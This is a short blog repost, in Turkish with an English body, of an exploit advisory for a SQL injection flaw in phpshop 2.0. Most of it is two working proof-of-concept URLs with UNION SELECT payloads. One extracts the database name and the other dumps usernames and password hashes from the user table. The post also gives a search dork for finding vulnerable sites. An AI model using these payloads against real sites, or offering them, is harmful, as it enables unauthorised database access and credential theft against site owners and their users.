phpshop 2.0 SQL Injection Vulnerability

phpshop 2.0 SQL Injection Açığı bulunmuş olup, Açık bulucunun SQL injection’un oluşum yeri ve açık hakkındaki açıklamaları şu şekilde bulunmaktadır;

# Exploit Title : phpshop 2.0 SQL Injection Vulnerability
# Author        : By onestree
# Software Link : http://code.google.com/p/phpshop/downloads/list
# tested        : windows 7 / ubuntu
# Dork          : inurl:"tanyakan pada rumput yang bergoyang"
 
SQLi p0c:
 
==================
 
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
 
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
 
 
 
 
Thanks :
 
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
 
indonesiancoder - moeslimh4x0r - go-coder

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir